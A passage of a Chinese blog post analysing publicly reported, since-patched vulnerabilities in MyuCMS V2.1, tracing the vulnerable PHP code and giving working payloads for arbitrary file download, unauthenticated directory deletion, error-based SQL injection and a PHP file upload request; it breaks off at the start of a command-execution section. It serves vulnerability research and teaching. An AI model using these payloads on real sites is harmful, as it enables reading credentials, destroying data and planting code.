<!DOCTYPE html><html lang="zh-CN"><head><meta charset="UTF-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><meta name="format-detection" content="telephone=no"><meta name="apple-mobile-web-app-capable" content="yes"><meta name="apple-mobile-web-app-status-bar-style" content="black"><link rel="icon" href="/images/icons/favicon-16x16.png?v=2.5.0" type="image/png" sizes="16x16"><link rel="icon" href="/images/icons/favicon-32x32.png?v=2.5.0" type="image/png" sizes="32x32"><meta name="google-site-verification" content="QDXQenTtxQ6MwW-M_7k9lw39Kq7F4pwFO0u1QAPYlDE"><meta name="description" content="前言        本文首发于先知社区 MyuCMS_V2.1漏洞分析  在CNVD看到一个MyuCMS的一个任意文件删除漏洞。然后去搜了下这个CMS，发现官网公告显示在V2.2.3版本修复了CNVD提供的多处漏洞。">
<meta property="og:type" content="article">
<meta property="og:title" content="MyuCMS_V2.1漏洞分析">
<meta property="og:url" content="http://www.7ten7.top/2020/02/11/2020-02-11-MyuCMS_V2.1%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90/index.html">
<meta property="og:site_name" content="7TEN7&#39;s Blog">
<meta property="og:description" content="前言        本文首发于先知社区 MyuCMS_V2.1漏洞分析  在CNVD看到一个MyuCMS的一个任意文件删除漏洞。然后去搜了下这个CMS，发现官网公告显示在V2.2.3版本修复了CNVD提供的多处漏洞。">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="https://pic.downk.cc/item/5e425eba2fb38b8c3c9d4a08.jpg">
<meta property="og:image" content="https://pic.downk.cc/item/5e425f232fb38b8c3c9d59ac.jpg">
<meta property="og:image" content="https://pic.downk.cc/item/5e4266e52fb38b8c3c9e7e3d.jpg">
<meta property="og:image" content="https://pic.downk.cc/item/5e428b772fb38b8c3ca3a1ca.jpg">
<meta property="og:image" content="https://pic.downk.cc/item/5e428dac2fb38b8c3ca3eea6.jpg">
<meta property="og:image" content="https://pic.downk.cc/item/5e42aa282fb38b8c3ca8272b.jpg">
<meta property="og:image" content="https://pic.downk.cc/item/5e42aa942fb38b8c3ca835ed.jpg">
<meta property="og:image" content="https://pic.downk.cc/item/5e42afb32fb38b8c3ca91428.jpg">
<meta property="og:image" content="https://pic.downk.cc/item/5e4391472fb38b8c3cc86b1e.jpg">
<meta property="og:image" content="https://pic.downk.cc/item/5e4391972fb38b8c3cc8794f.jpg">
<meta property="article:published_time" content="2020-02-10T16:00:00.000Z">
<meta property="article:modified_time" content="2020-04-23T12:56:29.045Z">
<meta property="article:author" content="7TEN7">
<meta property="article:tag" content="代码审计">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://pic.downk.cc/item/5e425eba2fb38b8c3c9d4a08.jpg"><title>MyuCMS_V2.1漏洞分析 | 7TEN7's Blog</title><link ref="canonical" href="http://www.7ten7.top/2020/02/11/2020-02-11-MyuCMS_V2.1%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90/"><link rel="alternate" href="/atom.xml" type="application/atom+xml"><link rel="dns-prefetch" href="https://cdn.jsdelivr.net"><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/@fortawesome/fontawesome-free@5.12.1/css/all.min.css" type="text/css"><link rel="stylesheet" href="/css/index.css?v=2.5.0"><script src="https://pagead2.googlesyndication.com/pagead/js/adsbygoogle.js" data-ad-client="ca-pub-4793862971469188" async=""></script><script>var Stun = window.Stun || {};
var CONFIG = {
  root: '/',
  algolia: undefined,
  assistSearch: undefined,
  fontIcon: {"prompt":{"success":"fas fa-check-circle","info":"fas fa-arrow-circle-right","warning":"fas fa-exclamation-circle","error":"fas fa-times-circle"},"copyBtn":"fas fa-copy"},
  sidebar: {"offsetTop":"20px","tocMaxDepth":6},
  header: {"enable":true,"showOnPost":false,"scrollDownIcon":true},
  postWidget: {"endText":true},
  nightMode: {"enable":true},
  back2top: {"enable":true},
  codeblock: {"style":"simple","highlight":"ocean","wordWrap":false},
  reward: false,
  fancybox: false,
  zoomImage: {"gapAside":"20px"},
  galleryWaterfall: undefined,
  lazyload: true,
  pjax: undefined,
  externalLink: {"icon":{"enable":true,"name":"fas fa-external-link-alt"}},
  shortcuts: undefined,
  prompt: {"copyButton":"复制","copySuccess":"复制成功","copyError":"复制失败"},
  sourcePath: {"js":"js","css":"css","images":"images"},
};

window.CONFIG = CONFIG;</script><meta name="generator" content="Hexo 4.2.1"></head><body><div class="container" id="container"><header class="header" id="header"><div class="header-inner header-inner--height header-inner--bgcolor"><nav class="header-nav header-nav--sticky"><div class="header-nav-inner"><div class="header-nav-menubtn"><i class="fas fa-bars"></i></div><div class="header-nav-menu"><div class="header-nav-menu-item"><a class="header-nav-menu-item__link" href="/"><span class="header-nav-menu-item__icon"><i class="fas fa-home"></i></span><span class="header-nav-menu-item__text">首页</span></a></div><div class="header-nav-menu-item"><a class="header-nav-menu-item__link" href="/archives/"><span class="header-nav-menu-item__icon"><i class="fas fa-folder-open"></i></span><span class="header-nav-menu-item__text">归档</span></a></div><div class="header-nav-menu-item"><a class="header-nav-menu-item__link" href="/tags/"><span class="header-nav-menu-item__icon"><i class="fas fa-tags"></i></span><span class="header-nav-menu-item__text">标签</span></a></div><div class="header-nav-menu-item"><a class="header-nav-menu-item__link" href="/friends/"><span class="header-nav-menu-item__icon"><i class="fas fa-link"></i></span><span class="header-nav-menu-item__text">友链</span></a></div></div><div class="header-nav-mode"><div class="mode"><div class="mode-track"><span class="mode-track-moon"></span><span class="mode-track-sun"></span></div><div class="mode-thumb"></div></div></div></div></nav></div></header><main class="main" id="main"><div class="main-inner"><div class="content-wrap" id="content-wrap"><div class="content" id="content"><!-- Just used to judge whether it is an article page--><div id="is-post"></div><div class="post"><header class="post-header"><h1 class="post-title">MyuCMS_V2.1漏洞分析</h1><div class="post-meta"><span class="post-meta-item post-meta-item--createtime"><span class="post-meta-item__icon"><i class="far fa-calendar-plus"></i></span><span class="post-meta-item__info">发表于</span><span class="post-meta-item__value">2020-02-11</span></span><span class="post-meta-item post-meta-item--wordcount"><span class="post-meta-item__icon"><i class="far fa-file-word"></i></span><span class="post-meta-item__info">字数统计</span><span class="post-meta-item__value">2.6k</span></span><span class="post-meta-item post-meta-item--readtime"><span class="post-meta-item__icon"><i class="far fa-clock"></i></span><span class="post-meta-item__info">阅读时长</span><span class="post-meta-item__value">21分</span></span></div></header><div class="post-body">
        <h1 id="前言"   >
          <a href="#前言" class="heading-link"><i class="fas fa-link"></i></a>前言</h1>
      <blockquote>
<p>本文首发于先知社区 <span class="exturl"><a class="exturl__link"   href="https://xz.aliyun.com/t/7271"  target="_blank" rel="noopener">MyuCMS_V2.1漏洞分析</a><span class="exturl__icon"><i class="fas fa-external-link-alt"></i></span></span></p>
</blockquote>
<p>在CNVD看到一个MyuCMS的一个任意文件删除漏洞。然后去搜了下这个CMS，发现官网公告显示在V2.2.3版本修复了CNVD提供的多处漏洞。<a id="more"></a></p>
<p>
        <img   class="lazyload lazyload-gif"
          src="/images/loading.svg" data-src="https://pic.downk.cc/item/5e425eba2fb38b8c3c9d4a08.jpg"  alt="">
      </p>
<p>怀着好奇的心里，去CNVD搜了下这个CMS，结果发现V2.1版本存在多处高危漏洞。既然这样，就来分析下这些漏洞产生的原因和利用方式。</p>
<p>
        <img   class="lazyload lazyload-gif"
          src="/images/loading.svg" data-src="https://pic.downk.cc/item/5e425f232fb38b8c3c9d59ac.jpg"  alt="">
      </p>

        <h1 id="过程分析"   >
          <a href="#过程分析" class="heading-link"><i class="fas fa-link"></i></a>过程分析</h1>
      <blockquote>
<p>MyuCMS 基于 Thinkphp 5.0.24 开发</p>
</blockquote>

        <h2 id="前台任意文件下载（中危）"   >
          <a href="#前台任意文件下载（中危）" class="heading-link"><i class="fas fa-link"></i></a>前台任意文件下载（中危）</h2>
      <p>既然是文件下载，先在整个项目中搜索下 <strong>download</strong> 关键字，尝试看看能不能直接定位到关键代码。</p>
<p>通过搜索定位到 <strong>bbs</strong> 模块下的 <strong>Index</strong> 控制器的 <strong>download</strong> 方法。</p>
<p>
        <img   class="lazyload lazyload-gif"
          src="/images/loading.svg" data-src="https://pic.downk.cc/item/5e4266e52fb38b8c3c9e7e3d.jpg"  alt="">
      </p>
<p><strong>download</strong> 方法接受三个参数，这三个参数我们是完全可控的，单从 <strong>download</strong> 这个方法来看，无任何参数内容限制，直接将 <strong>$url</strong> 和 <strong>$name</strong> 两个参数传递给了 <strong>Http</strong> 类的 <strong>download</strong> 方法来执行下载。</p>
<p>若 <strong>Http-&gt;download()</strong> 方法中还未对参数内容进行限制，便会造成任意文件下载漏洞。</p>
<p>接下来，我们跟进 <strong>Http-&gt;download()</strong> 方法。</p>
<figure class="highlight php"><div class="table-container"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">static</span> <span class="keyword">public</span> <span class="function"><span class="keyword">function</span> <span class="title">download</span> <span class="params">($filename, $showname=<span class="string">''</span>,$content=<span class="string">''</span>,$expire=<span class="number">180</span>)</span> </span>&#123;</span><br><span class="line">	<span class="keyword">if</span>(is_file($filename)) &#123; <span class="comment">//判断 $filename 是否为文件</span></span><br><span class="line">		$length = filesize($filename); <span class="comment">// 获取 $filename 的文件大小</span></span><br><span class="line">	&#125;<span class="keyword">elseif</span>($content != <span class="string">''</span>) &#123;</span><br><span class="line">		$length = strlen($content);</span><br><span class="line">	&#125;<span class="keyword">else</span> &#123;</span><br><span class="line">		throw_exception($filename.L(<span class="string">'下载文件不存在！'</span>)); <span class="comment">// 若文件不存在抛出异常</span></span><br><span class="line">	&#125;</span><br><span class="line">	<span class="keyword">if</span>(<span class="keyword">empty</span>($showname)) &#123;</span><br><span class="line">		$showname = $filename; <span class="comment">// $showname 为下载后文件的名称。若未设置则与被下载文件同名</span></span><br><span class="line">	&#125;</span><br><span class="line">	$showname = basename($showname); <span class="comment">//获取路径中的文件名部分</span></span><br><span class="line">	<span class="keyword">if</span>(!<span class="keyword">empty</span>($filename)) &#123;</span><br><span class="line">		$type = mime_content_type($filename); <span class="comment">//获取文件的MIME类型</span></span><br><span class="line">	&#125;<span class="keyword">else</span>&#123;</span><br><span class="line">		$type	 =	 <span class="string">"application/octet-stream"</span>;</span><br><span class="line">	&#125;</span><br><span class="line">	<span class="comment">//发送Http Header信息 开始下载</span></span><br><span class="line">	header(<span class="string">"Pragma: public"</span>);</span><br><span class="line">	header(<span class="string">"Cache-control: max-age="</span>.$expire);</span><br><span class="line">	<span class="comment">//header('Cache-Control: no-store, no-cache, must-revalidate');</span></span><br><span class="line">	header(<span class="string">"Expires: "</span> . gmdate(<span class="string">"D, d M Y H:i:s"</span>,time()+$expire) . <span class="string">"GMT"</span>);</span><br><span class="line">	header(<span class="string">"Last-Modified: "</span> . gmdate(<span class="string">"D, d M Y H:i:s"</span>,time()) . <span class="string">"GMT"</span>);</span><br><span class="line">	header(<span class="string">"Content-Disposition: attachment; filename="</span>.$showname);</span><br><span class="line">	header(<span class="string">"Content-Length: "</span>.$length);</span><br><span class="line">	header(<span class="string">"Content-type: "</span>.$type);</span><br><span class="line">	header(<span class="string">'Content-Encoding: none'</span>);</span><br><span class="line">	header(<span class="string">"Content-Transfer-Encoding: binary"</span> );</span><br><span class="line">	<span class="keyword">if</span>($content == <span class="string">''</span> ) &#123;</span><br><span class="line">		readfile($filename); <span class="comment">// 读取文件内容并输出，从而实现下载</span></span><br><span class="line">	&#125;<span class="keyword">else</span> &#123;</span><br><span class="line">		<span class="keyword">echo</span>($content);</span><br><span class="line">	&#125;</span><br><span class="line">	<span class="keyword">exit</span>();</span><br><span class="line">&#125;</span><br></pre></td></tr></table></div></figure>
<p>由如上代码我们可以看出，<strong>Http-&gt;download()</strong> 方法中同样<strong>未对传入的参数进行内容限制</strong>，只实现了下载的业务逻辑。</p>

        <h3 id="Payload"   >
          <a href="#Payload" class="heading-link"><i class="fas fa-link"></i></a>Payload</h3>
      <p>所以，由此可以得出任意文件下载的payload。</p>
<figure class="highlight plain"><div class="table-container"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">Payload: http:&#x2F;&#x2F;xxxxxxxxx&#x2F;bbs&#x2F;index&#x2F;download?url&#x3D;application&#x2F;database.php&amp;name&#x3D;&amp;local&#x3D;1</span><br><span class="line">Payload: http:&#x2F;&#x2F;xxxxxxxxx&#x2F;bbs&#x2F;index&#x2F;download?url&#x3D;c:&#x2F;windows&#x2F;win.ini&amp;name&#x3D;&amp;local&#x3D;1</span><br></pre></td></tr></table></div></figure>

        <h2 id="任意目录删除漏洞（高危）"   >
          <a href="#任意目录删除漏洞（高危）" class="heading-link"><i class="fas fa-link"></i></a>任意目录删除漏洞（高危）</h2>
      <p>在CNVD上看到的是任意文件删除。但我搜索过后发现只能删除任意目录，并不能只删除单独一个文件。</p>
<p>先全文搜索 <strong>unlink</strong> 函数，定位到存在文件删除功能的代码段。</p>
<p>定位到 <strong>application/common.php</strong> 中的 <strong>deleteun</strong> 函数</p>
<p>
        <img   class="lazyload lazyload-gif"
          src="/images/loading.svg" data-src="https://pic.downk.cc/item/5e428b772fb38b8c3ca3a1ca.jpg"  alt="">
      </p>
<figure class="highlight php"><div class="table-container"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="keyword">function</span> <span class="title">deleteun</span><span class="params">($dir_name)</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">    $result = <span class="keyword">false</span>;</span><br><span class="line">    <span class="keyword">if</span> (is_dir($dir_name)) &#123; <span class="comment">// 判断是否为目录</span></span><br><span class="line">        <span class="keyword">if</span> ($handle = opendir($dir_name)) &#123; <span class="comment">// 打开目录</span></span><br><span class="line">            <span class="keyword">while</span> (<span class="keyword">false</span> !== ($item = readdir($handle))) &#123; <span class="comment">// 通过这个 while 遍历目录中的文件 </span></span><br><span class="line">                <span class="keyword">if</span> ($item != <span class="string">'.'</span> &amp;&amp; $item != <span class="string">'..'</span>) &#123;</span><br><span class="line">                    <span class="keyword">if</span> (is_dir($dir_name . DS . $item)) &#123; <span class="comment">// 若遍历到的文件为子目录，则递归调用deleteun</span></span><br><span class="line">                        deleteun($dir_name . DS . $item);</span><br><span class="line">                    &#125; <span class="keyword">else</span> &#123;</span><br><span class="line">                        unlink($dir_name . DS . $item); <span class="comment">// 删除遍历到的文件</span></span><br><span class="line">                    &#125;</span><br><span class="line">                &#125;</span><br><span class="line">            &#125;</span><br><span class="line">            closedir($handle); <span class="comment">// 关闭文件夹</span></span><br><span class="line">            <span class="keyword">if</span> (rmdir($dir_name)) &#123; <span class="comment">// 删除该目录</span></span><br><span class="line">                $result = <span class="keyword">true</span>;</span><br><span class="line">            &#125;</span><br><span class="line">        &#125;</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    <span class="keyword">return</span> $result;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></div></figure>
<p>根据 <strong>deleteun</strong> 函数的实现代码来看，我们可以看到该函数中对传入的参数无任何限制。</p>
<p>然后在整个项目中搜索，看哪个文件中调用了 <strong>deleteun</strong> 函数。</p>
<p>发现总共三处两个文件调用了该函数，且这三处代码内容相同，只不过是传递给的 <strong>deleteun</strong> 函数的参数不同，我们可以判断出，这三处都可以触发任意目录删除漏洞。</p>
<p>
        <img   class="lazyload lazyload-gif"
          src="/images/loading.svg" data-src="https://pic.downk.cc/item/5e428dac2fb38b8c3ca3eea6.jpg"  alt="">
      </p>
<p>这三处的不同之处在于。<strong>Muban.php</strong> 继承了 <strong>Common</strong> 类，在 <strong>Common</strong> 类中实现了对于是否已经登录的验证。实现代码如下。</p>
<figure class="highlight php"><div class="table-container"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">public</span> <span class="function"><span class="keyword">function</span> <span class="title">_initialize</span><span class="params">()</span></span>&#123;</span><br><span class="line">    <span class="keyword">if</span>(!session(<span class="string">'usermail'</span>) || !session(<span class="string">'kouling'</span>))&#123;</span><br><span class="line">       <span class="keyword">$this</span>-&gt;error(<span class="string">'请登录'</span>,url(<span class="string">'login/index'</span>)); </span><br><span class="line">       <span class="keyword">print</span> s();</span><br><span class="line">    &#125;</span><br><span class="line">	</span><br><span class="line">&#125;</span><br></pre></td></tr></table></div></figure>
<p>而 <strong>Addons.php</strong> 继承自 <strong>AdminBase</strong> 类，且初始化时执行父类 <strong>AdminBase</strong> 的 <strong>_initialize()</strong> 方法，在 <strong>AdminBase</strong> 类中调用了父类 <strong>Controller</strong> 的 <strong>_initialize()</strong> 方法。而父类的 <strong>Controller</strong> 的 <strong>_initialize();</strong> 方法的实现内容为空。</p>
<p>所以 <strong>Addons.php</strong> 在未登录的情况下也可以访问。这意味我们不需要登录后台也可以触发任意目录删除漏洞。</p>

        <h3 id="Payload-1"   >
          <a href="#Payload-1" class="heading-link"><i class="fas fa-link"></i></a>Payload</h3>
      <p>所以给出 Payload 如下，即可删除整个 <strong>install</strong> 目录</p>
<figure class="highlight plain"><div class="table-container"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">Payload: http:&#x2F;&#x2F;xxxxxxxxx&#x2F;admin&#x2F;Addons&#x2F;un?info&#x3D;..&#x2F;install</span><br></pre></td></tr></table></div></figure>

        <h2 id="SQL注入漏洞（高危）"   >
          <a href="#SQL注入漏洞（高危）" class="heading-link"><i class="fas fa-link"></i></a>SQL注入漏洞（高危）</h2>
      <p>在 CNVD 上的描述为，<strong>MyuCMS us***_xi***.html页面存在SQL注入漏洞</strong></p>
<p>通过对整个项目文件的搜索，最终确定为 <strong>user_xiaoxi.html</strong> 文件。</p>
<p>该视图文件，对应的控制器为 <strong>application/bbs/controller/User.php</strong> 。显示消息为 <strong>User-&gt;xiaoxi()</strong> 方法。该方法中无用户可控参数。所以注入不可能在此方法中。</p>
<p>
        <img   class="lazyload lazyload-gif"
          src="/images/loading.svg" data-src="https://pic.downk.cc/item/5e42aa282fb38b8c3ca8272b.jpg"  alt="">
      </p>
<p>如图所示功能处可将未读消息更改为已读消息。同时我们抓包观察。未读消息为其他用户在登录用户发布的文章下留言所产生。</p>
<p>
        <img   class="lazyload lazyload-gif"
          src="/images/loading.svg" data-src="https://pic.downk.cc/item/5e42aa942fb38b8c3ca835ed.jpg"  alt="">
      </p>
<p>可以发现，该功能对应的路由地址，以及所提交的参数。我们找到路由地址对应的方法为 <strong>User-&gt;xiaoxidel()</strong> 代码如下</p>
<figure class="highlight php"><div class="table-container"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">public</span> <span class="function"><span class="keyword">function</span> <span class="title">xiaoxidel</span><span class="params">($ids)</span></span></span><br><span class="line"><span class="function">    </span>&#123;</span><br><span class="line">        <span class="keyword">if</span> (!session(<span class="string">'userid'</span>) || !session(<span class="string">'username'</span>)) &#123; <span class="comment">// 进行登录判断</span></span><br><span class="line">            <span class="keyword">$this</span>-&gt;error(<span class="string">'亲！请登录'</span>,url(<span class="string">'bbs/login/index'</span>));</span><br><span class="line">        &#125; <span class="keyword">else</span> &#123;</span><br><span class="line">        	<span class="keyword">if</span> ($ids==<span class="number">0</span>) &#123; <span class="comment">// 根据 ids 参数来判断执行的动作为标记消息还是删除消息</span></span><br><span class="line">        	$id = input(<span class="string">'id'</span>); <span class="comment">// 通过input助手函数获取需要操作的消息对应的 id</span></span><br><span class="line">        	$data[<span class="string">'open'</span>] = <span class="number">1</span>;</span><br><span class="line">			<span class="keyword">if</span> (Db::name(<span class="string">'xiaoxi'</span>)-&gt;where(<span class="string">"id = &#123;$id&#125;"</span>)-&gt;where(<span class="string">'userid'</span>, session(<span class="string">'userid'</span>))-&gt;update($data)) &#123; <span class="comment">// 此处第一个 where() 使用字符串条件时没有配合预处理机制，所以会直接将 id=$id 拼接到SQL语句中。从而造成了SQL语句可控，形成注入。</span></span><br><span class="line">				<span class="keyword">return</span> json(<span class="keyword">array</span>(<span class="string">'code'</span> =&gt; <span class="number">200</span>, <span class="string">'msg'</span> =&gt; <span class="string">'标记已读成功'</span>));</span><br><span class="line">			&#125; <span class="keyword">else</span> &#123;</span><br><span class="line">				<span class="keyword">return</span> json(<span class="keyword">array</span>(<span class="string">'code'</span> =&gt; <span class="number">0</span>, <span class="string">'msg'</span> =&gt; <span class="string">'标记已读失败'</span>));</span><br><span class="line">			&#125;</span><br><span class="line">        	&#125;<span class="keyword">elseif</span> ($ids==<span class="number">1</span>)&#123;</span><br><span class="line">        	$id = input(<span class="string">'id'</span>);</span><br><span class="line">			<span class="keyword">if</span> (Db::name(<span class="string">'xiaoxi'</span>)-&gt;where(<span class="string">"id = &#123;$id&#125;"</span>)-&gt;where(<span class="string">'userid'</span>, session(<span class="string">'userid'</span>))-&gt;delete($id)) &#123;</span><br><span class="line">				<span class="keyword">return</span> json(<span class="keyword">array</span>(<span class="string">'code'</span> =&gt; <span class="number">200</span>, <span class="string">'msg'</span> =&gt; <span class="string">'彻底删除成功'</span>));</span><br><span class="line">			&#125; <span class="keyword">else</span> &#123;</span><br><span class="line">				<span class="keyword">return</span> json(<span class="keyword">array</span>(<span class="string">'code'</span> =&gt; <span class="number">0</span>, <span class="string">'msg'</span> =&gt; <span class="string">'彻底删除失败'</span>));</span><br><span class="line">			&#125;</span><br><span class="line">        	&#125;</span><br><span class="line">        &#125;</span><br><span class="line">    &#125;</span><br></pre></td></tr></table></div></figure>
<p>上述代码中，未对 <strong>$id</strong> 的内容进行限制，而是直接带入到了SQL语句中，且该CMS并<strong>未设置全局过滤</strong>。所以导致了此处注入的产生。</p>

        <h3 id="Payload-2"   >
          <a href="#Payload-2" class="heading-link"><i class="fas fa-link"></i></a>Payload</h3>
      <p>Payload如下</p>
<figure class="highlight plain"><div class="table-container"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">Payload: id&#x3D;2) and updatexml(1,concat(0x7e,(select database()),0x7e),1)  and (1</span><br></pre></td></tr></table></div></figure>
<p>在下图所示位置打上断点，即可查执行的SQL语句</p>
<p>
        <img   class="lazyload lazyload-gif"
          src="/images/loading.svg" data-src="https://pic.downk.cc/item/5e42afb32fb38b8c3ca91428.jpg"  alt="">
      </p>

        <h2 id="文件上传漏洞（高危）"   >
          <a href="#文件上传漏洞（高危）" class="heading-link"><i class="fas fa-link"></i></a>文件上传漏洞（高危）</h2>
      <p>CNVD 上对应的标题为 <strong>myucms fo***.php页面存在文件上传漏洞</strong></p>
<p>搜索项目中fo开头的文件，定位到 <strong>application/admin/controller/Forum.php</strong> 中的 <strong>doUploadPic</strong> 方法</p>
<figure class="highlight php"><div class="table-container"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">public</span> <span class="function"><span class="keyword">function</span> <span class="title">doUploadPic</span><span class="params">()</span></span></span><br><span class="line"><span class="function">    </span>&#123;</span><br><span class="line">        $file = request()-&gt;file(<span class="string">'FileName'</span>);</span><br><span class="line">        $info = $file-&gt;move(ROOT_PATH . DS . <span class="string">'uploads'</span>);</span><br><span class="line">		<span class="keyword">if</span>($info)&#123;</span><br><span class="line">			$path = WEB_URL . DS . <span class="string">'uploads'</span> . DS .$info-&gt;getSaveName();</span><br><span class="line">			<span class="keyword">echo</span> str_replace(<span class="string">"\\"</span>,<span class="string">"/"</span>,$path);</span><br><span class="line">        &#125;</span><br><span class="line">    &#125;</span><br></pre></td></tr></table></div></figure>
<p>可以看到上述代码调用了 <strong>Thinkphp</strong> 内置的 <strong>move</strong> 方法来对上传的文件进行处理。但是在调用 <strong>move</strong> 方法前未调用 <strong>validate()</strong> 方法来设置验证规则。所以此处存在任意文件上传。</p>

        <h3 id="Payload-3"   >
          <a href="#Payload-3" class="heading-link"><i class="fas fa-link"></i></a>Payload</h3>
      <p>根据 <strong>doUploadPic()</strong> 方法构建 <strong>Payload数据包</strong> 如下：</p>
<figure class="highlight plain"><div class="table-container"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br></pre></td><td class="code"><pre><span class="line">POST &#x2F;admin&#x2F;forum&#x2F;doUploadPic HTTP&#x2F;1.1</span><br><span class="line">Host: www.myu.io</span><br><span class="line">User-Agent: Mozilla&#x2F;5.0 (Windows NT 10.0; Win64; x64; rv:72.0) Gecko&#x2F;20100101 Firefox&#x2F;72.0</span><br><span class="line">Accept: text&#x2F;html,application&#x2F;xhtml+xml,application&#x2F;xml;q&#x3D;0.9,image&#x2F;webp,*&#x2F;*;q&#x3D;0.8</span><br><span class="line">Accept-Language: zh-CN,zh;q&#x3D;0.8,zh-TW;q&#x3D;0.7,zh-HK;q&#x3D;0.5,en-US;q&#x3D;0.3,en;q&#x3D;0.2</span><br><span class="line">Accept-Encoding: gzip, deflate</span><br><span class="line">Connection: close</span><br><span class="line">Content-Type: multipart&#x2F;form-data; boundary&#x3D;---------------------------18467633426500</span><br><span class="line">Cookie: PHPSESSID&#x3D;l6ijpio06mqmhcdq654g63eq90; UM_distinctid&#x3D;170343d2b4a291-0a4e487f247e62-4c302978-1fa400-170343d2b4b28f; CNZZDATA1277972876&#x3D;1874892142-1581419669-%7C1581432904</span><br><span class="line">Upgrade-Insecure-Requests: 1</span><br><span class="line">Content-Length: 206</span><br><span class="line"></span><br><span class="line">-----------------------------18467633426500</span><br><span class="line">Content-Disposition: form-data; name&#x3D;&quot;FileName&quot;; filename&#x3D;&quot;1.php&quot;</span><br><span class="line">Content-Type: image&#x2F;jpeg</span><br><span class="line"></span><br><span class="line">&lt;?php phpinfo(); ?&gt;</span><br><span class="line">-----------------------------18467633426500--</span><br></pre></td></tr></table></div></figure>

        <h2 id="命令执行（高危）"   >
          <a href="#命令执行（高危）" class="heading-link"><i class="fas fa-link"></i></a>命令执行（高危）</h2>
      <p>CNVD上没有说明存在的页面。我找到的是一处能控制 <strong>extre/web.php</strong> 内容的漏洞。</p>
<p>漏洞成因是使用 <strong>file_put_contents</strong> 函数更新 <strong>extre</strong> 下配置文件的内容时，未对参数内容做限制，直接写入造成。</p>
<p>相同原理漏洞影响3个文件共5处。分别为 <strong>application/admin/controller/Config.php</strong>，  <strong>application/admin/controller/Muban.php</strong> ，<strong>application/admin/controller/Point.php</strong>  </p>
<p>此处以 <strong>application/admin/controller/Config.php</strong> 下的 <strong>add()</strong> 方法为例分析</p>
<figure class="highlight php"><div class="table-container"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">public</span> <span class="function"><span 